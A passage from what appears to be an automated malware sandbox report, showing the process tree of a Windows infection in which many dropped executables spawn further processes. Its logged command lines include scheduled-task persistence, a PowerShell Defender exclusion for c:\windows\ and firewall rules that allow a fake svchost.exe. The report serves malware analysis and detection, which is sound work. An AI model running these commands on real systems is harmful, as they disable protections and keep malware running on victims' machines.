                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:5712
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\2ZQE6hW8SvU0CDnAEYNBC84i.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\2ZQE6hW8SvU0CDnAEYNBC84i.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:3432
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                3⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:5188
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                3⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:6108
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\OXKUmC2njhfB7uDqCrRYygBZ.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\OXKUmC2njhfB7uDqCrRYygBZ.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:1920
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1920 -s 248
                                                                                                3⤵
                                                                                                • Program crash
                                                                                                • Checks processor information in registry
                                                                                                • Enumerates system info in registry
                                                                                                PID:6040
                                                                                            • C:\Users\Admin\Pictures\Adobe Films\YB8ZiNkeljVubxz3Ue9u_BOc.exe
                                                                                              "C:\Users\Admin\Pictures\Adobe Films\YB8ZiNkeljVubxz3Ue9u_BOc.exe"
                                                                                              2⤵
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:2092
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\YB8ZiNkeljVubxz3Ue9u_BOc.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\YB8ZiNkeljVubxz3Ue9u_BOc.exe"
                                                                                                3⤵
                                                                                                  PID:5352
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5352 -s 208
                                                                                                    4⤵
                                                                                                    • Program crash
                                                                                                    PID:5560
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\eLoB3OPgBLekyxCj_FYOKEqz.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\eLoB3OPgBLekyxCj_FYOKEqz.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks processor information in registry
                                                                                                • Enumerates system info in registry
                                                                                                PID:1372
                                                                                              • C:\Users\Admin\Pictures\Adobe Films\tKM9hCd7PgE4JZmHXKi4pb5v.exe
                                                                                                "C:\Users\Admin\Pictures\Adobe Films\tKM9hCd7PgE4JZmHXKi4pb5v.exe"
                                                                                                2⤵
                                                                                                • Executes dropped EXE
                                                                                                • Checks BIOS information in registry
                                                                                                • Identifies Wine through registry keys
                                                                                                • Adds Run key to start application
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                • Drops file in Windows directory
                                                                                                • Modifies registry class
                                                                                                PID:836
                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\0aFxMi4sVE.bat"
                                                                                                  3⤵
                                                                                                  • Blocklisted process makes network request
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:476
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    4⤵
                                                                                                      PID:5972
                                                                                                    • C:\Windows\SysWOW64\w32tm.exe
                                                                                                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                      4⤵
                                                                                                        PID:5228
                                                                                                        • C:\Windows\system32\w32tm.exe
                                                                                                          w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                          5⤵
                                                                                                            PID:2340
                                                                                                        • C:\Recovery\WindowsRE\cmd.exe
                                                                                                          "C:\Recovery\WindowsRE\cmd.exe"
                                                                                                          4⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Identifies Wine through registry keys
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          • Suspicious behavior: GetForegroundWindowSpam
                                                                                                          PID:6968
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\aJNjEi2JQGsxHyXlPzek2jhd.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\aJNjEi2JQGsxHyXlPzek2jhd.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5484
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri0541e16ce794d258f.exe
                                                                                                    Fri0541e16ce794d258f.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    PID:2264
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2264 -s 260
                                                                                                      2⤵
                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                      • Drops file in Windows directory
                                                                                                      • Program crash
                                                                                                      • Checks processor information in registry
                                                                                                      • Enumerates system info in registry
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:2708
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS80888524\Fri051e1e7444.exe
                                                                                                    Fri051e1e7444.exe
                                                                                                    1⤵
                                                                                                    • Executes dropped EXE
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:4136
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\h96SopsliqWsSSFml4Wwfz61.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\h96SopsliqWsSSFml4Wwfz61.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5160
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\FQutyC4Oa_P8pFvsnnZHnY6u.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\FQutyC4Oa_P8pFvsnnZHnY6u.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3960
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\eLoB3OPgBLekyxCj_FYOKEqz.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\eLoB3OPgBLekyxCj_FYOKEqz.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:3692
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3692 -s 220
                                                                                                        3⤵
                                                                                                        • Program crash
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:4636
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\A2OLX2LKycXRlKhj9aYBn3pZ.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\A2OLX2LKycXRlKhj9aYBn3pZ.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5668
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\XXUkq96_wRb_Lj68yg777Xz7.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\XXUkq96_wRb_Lj68yg777Xz7.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:4388
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\FYsRIpGlixSGTyXW0DS2kWNh.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\FYsRIpGlixSGTyXW0DS2kWNh.exe"
                                                                                                      2⤵
                                                                                                        PID:5560
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\FYsRIpGlixSGTyXW0DS2kWNh.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\FYsRIpGlixSGTyXW0DS2kWNh.exe"
                                                                                                          3⤵
                                                                                                            PID:2896
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2896 -s 204
                                                                                                              4⤵
                                                                                                              • Program crash
                                                                                                              • Checks processor information in registry
                                                                                                              • Enumerates system info in registry
                                                                                                              PID:6064
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\tKM9hCd7PgE4JZmHXKi4pb5v.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\tKM9hCd7PgE4JZmHXKi4pb5v.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Identifies Wine through registry keys
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:2240
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\2ZQE6hW8SvU0CDnAEYNBC84i.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\2ZQE6hW8SvU0CDnAEYNBC84i.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:5232
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                            3⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:6124
                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                            schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                            3⤵
                                                                                                            • Creates scheduled task(s)
                                                                                                            PID:6100
                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\YB8ZiNkeljVubxz3Ue9u_BOc.exe
                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\YB8ZiNkeljVubxz3Ue9u_BOc.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:5156
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\YB8ZiNkeljVubxz3Ue9u_BOc.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\YB8ZiNkeljVubxz3Ue9u_BOc.exe"
                                                                                                            3⤵
                                                                                                              PID:3300
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 3300 -s 204
                                                                                                                4⤵
                                                                                                                • Program crash
                                                                                                                • Checks processor information in registry
                                                                                                                • Enumerates system info in registry
                                                                                                                PID:5836
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\1MytaMiqKRuffLDoATR0ckXx.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\1MytaMiqKRuffLDoATR0ckXx.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Drops file in Windows directory
                                                                                                            PID:4208
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                              3⤵
                                                                                                                PID:6588
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  4⤵
                                                                                                                    PID:5188
                                                                                                                • C:\Windows\System32\netsh.exe
                                                                                                                  "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                  3⤵
                                                                                                                    PID:2948
                                                                                                                  • C:\Windows\System32\netsh.exe
                                                                                                                    "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                    3⤵
                                                                                                                      PID:3160
                                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                      schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                      3⤵
                                                                                                                      • Creates scheduled task(s)
                                                                                                                      PID:7140
                                                                                                                    • C:\Windows\System\svchost.exe
                                                                                                                      "C:\Windows\System\svchost.exe" formal
                                                                                                                      3⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in Windows directory
                                                                                                                      PID:6944
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                        4⤵
                                                                                                                          PID:7072
                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                          4⤵
                                                                                                                            PID:6648
                                                                                                                          • C:\Windows\System32\netsh.exe
                                                                                                                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                            4⤵
                                                                                                                              PID:7052
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\LYkeys7jBh_1zSYHz_DluWKa.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\LYkeys7jBh_1zSYHz_DluWKa.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Checks BIOS information in registry
                                                                                                                          • Checks whether UAC is enabled
                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                          PID:1904
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\nRkGJbRPbjCiJsHpTNMixlVl.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\nRkGJbRPbjCiJsHpTNMixlVl.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5436
                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 5436 -s 252
                                                                                                                            3⤵
                                                                                                                            • Program crash
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Enumerates system info in registry
                                                                                                                            PID:1428
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\_EPS3pBGVso83UqveAEA0Ebp.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\_EPS3pBGVso83UqveAEA0Ebp.exe"
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5548
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\_EPS3pBGVso83UqveAEA0Ebp.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\_EPS3pBGVso83UqveAEA0Ebp.exe"
                                                                                                                            3⤵
                                                                                                                              PID:4300
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\OXKUmC2njhfB7uDqCrRYygBZ.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\OXKUmC2njhfB7uDqCrRYygBZ.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5264
                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 5264 -s 220
                                                                                                                              3⤵
                                                                                                                              • Program crash
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              PID:5272
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\I45ty7uI_5mlD0qWDPvi_yOu.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\I45ty7uI_5mlD0qWDPvi_yOu.exe"
                                                                                                                            2⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:5240
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                              3⤵
                                                                                                                                PID:6968
                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 1248
                                                                                                                                  4⤵
                                                                                                                                  • Program crash
                                                                                                                                  • Checks processor information in registry
                                                                                                                                  • Enumerates system info in registry
                                                                                                                                  PID:6060
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\csLwqYy5lXZy5D409KMGC71R.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\csLwqYy5lXZy5D409KMGC71R.exe"
                                                                                                                              2⤵
                                                                                                                                PID:5940
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\csLwqYy5lXZy5D409KMGC71R.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\csLwqYy5lXZy5D409KMGC71R.exe"
                                                                                                                                  3⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                  PID:3600
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\4oo03pia0pv2Zt3IKKc8cOyY.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\4oo03pia0pv2Zt3IKKc8cOyY.exe"
                                                                                                                                2⤵
                                                                                                                                  PID:3056
                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:1560
                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\inst3.exe
                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\inst3.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:5328
                                                                                                                                  • C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe
                                                                                                                                    "C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    PID:4560
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\ph8IlsO83OOH0nwkp81AAKey.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\ph8IlsO83OOH0nwkp81AAKey.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:1844
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\bRXKmYt74b1jjnf5WfZeZK0C.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\bRXKmYt74b1jjnf5WfZeZK0C.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:5928
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-I8NL4.tmp\bRXKmYt74b1jjnf5WfZeZK0C.tmp
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-I8NL4.tmp\bRXKmYt74b1jjnf5WfZeZK0C.tmp" /SL5="$400B4,506127,422400,C:\Users\Admin\Pictures\Adobe Films\bRXKmYt74b1jjnf5WfZeZK0C.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:4060
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-OLEFD.tmp\DYbALA.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-OLEFD.tmp\DYbALA.exe" /S /UID=2710
                                                                                                                                      4⤵
                                                                                                                                      • Drops file in Drivers directory
                                                                                                                                      • Adds Run key to start application
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      PID:5880
                                                                                                                                      • C:\Program Files\Windows Defender\JUAJJRHEAD\foldershare.exe
                                                                                                                                        "C:\Program Files\Windows Defender\JUAJJRHEAD\foldershare.exe" /VERYSILENT
                                                                                                                                        5⤵
                                                                                                                                        • Suspicious behavior: GetForegroundWindowSpam
                                                                                                                                        PID:7124
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\5c-c076f-b6a-4d088-1e23af4900d5c\Seshyqybita.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\5c-c076f-b6a-4d088-1e23af4900d5c\Seshyqybita.exe"
                                                                                                                                        5⤵
                                                                                                                                          PID:5196
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                            6⤵
                                                                                                                                            • Adds Run key to start application
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            PID:7836
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffea1446f8,0x7fffea144708,0x7fffea144718
                                                                                                                                              7⤵
                                                                                                                                                PID:7880
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
                                                                                                                                                7⤵
                                                                                                                                                  PID:8176
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
                                                                                                                                                  7⤵
                                                                                                                                                    PID:8220
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2696 /prefetch:8
                                                                                                                                                    7⤵
                                                                                                                                                      PID:8252
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
                                                                                                                                                      7⤵
                                                                                                                                                        PID:8488
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1
                                                                                                                                                        7⤵
                                                                                                                                                          PID:8592
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4668 /prefetch:1
                                                                                                                                                          7⤵
                                                                                                                                                            PID:9100
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5264 /prefetch:1
                                                                                                                                                            7⤵
                                                                                                                                                              PID:9232
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 /prefetch:8
                                                                                                                                                              7⤵
                                                                                                                                                                PID:9744
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5852 /prefetch:8
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:9856
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4676 /prefetch:2
                                                                                                                                                                  7⤵
                                                                                                                                                                    PID:6996
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,4962858574112063707,11929389295941220395,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3828 /prefetch:1
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:9432
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4752
                                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
